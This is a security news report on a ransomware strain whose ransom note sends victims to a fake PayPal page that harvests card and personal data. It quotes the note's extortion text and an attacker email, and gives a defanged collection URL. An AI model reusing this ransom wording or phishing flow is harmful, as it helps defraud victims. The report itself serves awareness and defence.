• Researchers spotted new ransomware campaign containing a ransom note asking users to pay via Bitcoin or use PayPal.
  • Once users click on Paypal, they are redirected to a fraudulent page asking for users’ personal information and payment details.

Researchers from MalwareHunterTeam have discovered new ransomware which is capable of stealing PayPal credentials via a phishing site. Researchers revealed that the ransomware contained a ransom note asking users to pay via Bitcoin or use PayPal.

The ransom note which states that ‘Files have been encrypted! and your computer has been limited!’ asks users to pay via Bitcoin or PayPal for unlocking their PCs.

“Files have been encrypted! and your computer has been limited! To unlock your PC you must pay with one of the payment methods provided, we regularly check the activity of your screen and to see if you have paid, PayPal automatically sends us a notification once you’ve paid, But if it doesn't unlock your PC upon payment contact us CryTekk@protonmail[.]com,” the ransom note read, BleepingComputer reported.

“When you pay via BTC, send us an email following your REF number if your PC doesn't unencrypt. Once you pay, your PC will be decrypted. However, if you don’t within 14 days we will continue to infect your PC and extract all your data and use it,” the ransom note added.

Fraudulent PayPal phishing page

The ransom note gives users a choice either to pay via Bitcoin or use PayPal.

  • If users opt for PayPal by clicking PayPal ‘Buy Now’ button, they will be redirected to a legitimate looking fraudulent phishing page.
  • The fraudulent PayPal page then asks for users’ payment details such as payment card holder’s name, debit/credit card number, expiry date, CVV number, and password.
  • Once victims submit their payment details, the collected information will be sent to http[:]//ppyc-ve0rf[.]890m[.]com/s2[.]php.
  • The fraudulent page will then ask for users’ personal information including address.
  • Once all the information has been entered and submitted, the phishing page will state that your account has been unlocked.
  • Later, users will be redirected to the official PayPal login page.

MalwareHunterTeam tweeted, “A ransom note that direct victims to a PayPal phishing page. Clicking on the Buy Now button, it directs to the credit card part of the Phish already (so the login part is skipped). After filling & clicking Agree comes the personal info part & then finished.”

Researchers’ recommendations

  • Researchers request users to exercise caution while logging into any web page.
  • It is very important to always analyze web pages and check for its authenticity before entering login credentials.
  • Moreover, researchers recommend users to not enter any information and leave the page if the address looks suspicious or in case of any content mismatch.
Cyware Publisher